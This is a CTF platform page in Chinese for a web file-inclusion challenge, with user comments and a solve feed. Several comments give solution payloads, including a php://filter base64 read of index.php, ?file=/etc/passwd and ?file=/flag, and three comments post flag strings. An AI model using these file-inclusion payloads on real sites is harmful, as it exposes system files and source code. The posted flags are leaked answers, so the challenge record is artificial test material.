文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 10991
提  示:
描  述:
flag{}
评论
嵌入式学的CTF 1年前

PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429

回复 0

xiaoxiao972521 1年前

????直接/flag就出来了?

回复 3

iwindy 1年前

没意思,为啥3金币

回复 0

453137 1年前

flag{3f73582017c0a7d0a0d1c937fcb9ccda}

回复 0

gyc3153616052 2年前

flag{d2fc833912015ef20e29905ab607e995}

回复 0

llluyan 2年前

flag:flag{2773e5133de5c764209074ecd6cf2a3a}

回复 0

canxue11 2年前

payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag

回复 1

HuangYanQwQ 2年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 10

snickerX 2年前

php://filter伪协议

回复 1

LHJ2022 2年前

http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag

回复 14

WriteUp

image
harry

2 金币

评分(10)

解题动态

wbbcw 攻破了该题 3小时前
她说我们只是朋友 攻破了该题 4小时前
1185461366 攻破了该题 6小时前
lihonglin 攻破了该题 10小时前
jsc111 攻破了该题 10小时前
buggy 攻破了该题 13小时前
13607979046 攻破了该题 15小时前
18519320846 攻破了该题 1天前
szmlzw120 攻破了该题 1天前
zhiyin 攻破了该题 1天前
18653368728 攻破了该题 1天前
cyy1233 攻破了该题 1天前
xgame950830 攻破了该题 1天前
Liㄨ_Yaㄝ 攻破了该题 1天前
622独爱辉神 攻破了该题 1天前
mori77 攻破了该题 1天前
lousikf 攻破了该题 1天前
zxingxing121 攻破了该题 1天前
nyanya 攻破了该题 1天前
fsvipp 攻破了该题 2天前
问题反馈